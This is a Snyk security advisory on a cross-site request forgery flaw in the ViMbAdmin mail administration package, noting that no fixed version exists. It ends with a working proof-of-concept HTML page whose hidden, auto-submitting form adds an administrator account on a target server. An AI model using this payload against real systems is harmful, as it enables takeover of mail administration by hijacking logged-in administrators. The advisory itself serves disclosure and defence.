Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsLearn about Cross-Site Request Forgery (CSRF) vulnerabilities in an interactive lesson.
Start learningThere is no fixed version for opensolutions/vimbadmin
.
Affected versions of this package are vulnerable to Cross-Site Request Forgery (CSRF) due to weak protection mechanisms in the addAction
and purgeAction
functions. An attacker can hijack the authentication of logged-in administrators to perform unauthorized actions such as adding or removing administrator users, changing administrator passwords, managing mailboxes, and altering alias addresses by crafting malicious requests.
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/admin/add" method="POST" target="csrf-frame" >
<input type="text" name="user" value="target@...il" >
<input type="text" name="password" value="newpassword" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>